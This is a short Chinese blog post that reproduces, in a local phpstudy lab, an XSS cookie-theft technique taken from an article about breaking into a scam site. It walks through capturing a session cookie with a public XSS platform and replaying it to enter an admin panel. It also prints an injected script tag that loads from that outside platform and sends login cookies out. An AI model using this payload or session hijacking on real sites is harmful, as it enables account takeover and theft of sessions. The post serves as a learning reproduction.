前言
最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下
phpstudy环境复现
找一个xss平台,如 http://xsscom.com/
随便新建一个项目111,复制下面的代码到存在xss的地方即可
直接找个反射型xss试一下(这里在虚机登录)
这里xss平台获取到用户登录情况
用这个获取到的cookie登录一下后台(在物理机试下)
这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditThisCookie
修改对应的Cookies的PHPSESSID和security的值即可登录
修改cookie后刷新页面
至此已成功利用拿到cookie并登录后台
文中案例复现
另外添加如下代码到登录后跳转到的页面index.php做下测试
echo '<script src=http://xsscom.com//xxxxxx></script>';
可以看到登录后,平台就收到了cookie